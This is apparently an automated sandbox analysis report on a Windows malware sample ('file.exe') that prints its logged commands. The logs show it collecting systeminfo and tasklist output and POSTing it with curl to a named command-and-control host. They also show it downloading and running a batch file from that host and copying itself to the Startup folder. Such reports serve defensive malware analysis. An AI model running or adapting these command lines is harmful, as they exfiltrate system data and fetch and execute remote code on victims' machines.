Code function: 0_2_002622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_002622DA

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 1" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 1" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 1" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00240B62

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00241663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00241663

Source: file.exe, file.exe.11.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00200698 cpuid

0_2_00200698

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00258195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00258195

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0023D27A GetUserNameW,

0_2_0023D27A

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0021B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0021B952

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001E42DE

Stealing of Sensitive Information

Gathers system information via systeminfo

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt	Jump to behavior

Source: file.exe	Binary or memory string: WIN_81
Source: file.exe	Binary or memory string: WIN_XP
Source: file.exe.11.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: file.exe	Binary or memory string: WIN_XPe
Source: file.exe	Binary or memory string: WIN_VISTA
Source: file.exe	Binary or memory string: WIN_7
Source: file.exe	Binary or memory string: WIN_8

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00261204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00261204
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00261806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00261806
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	20_2_005C1204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	20_2_005C1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	231 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	12 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	147 System Information Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 Masquerading	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	24 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	24 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	29%	ReversingLabs
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	29%	ReversingLabs

Source	Detection	Scanner	Label
https://peerhost59mj7i6macla65r.com/search/::z	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/%	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/K	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/Bi	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/--	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/H	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/735C417070446174615C526F616D696E675C4D6963726F736F66745C5	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/5iu	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/44	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/bB	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/E-H	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/g_	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/cb	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/n64;	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/7	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/735C4465736B746F705C66696C652E657865	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/cur32.dll	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/W	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/T	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/;	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/Ti	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/c	0%	Avira URL Cloud	safe
https://peerhost59mj7i6macla65r.com/search/ow-	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
peerhost59mj7i6macla65r.com	94.154.172.218	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://peerhost59mj7i6macla65r.com/search/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://peerhost59mj7i6macla65r.com/search/%	file.exe, 00000000.00000002.3389486145.0000000001048000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/735C417070446174615C526F616D696E675C4D6963726F736F66745C5	file.exe, 00000014.00000003.2377965624.00000000016F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/::z	curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/H	curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/K	curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/Bi	curl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/--	curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/44	curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/bB	curl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/5iu	curl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
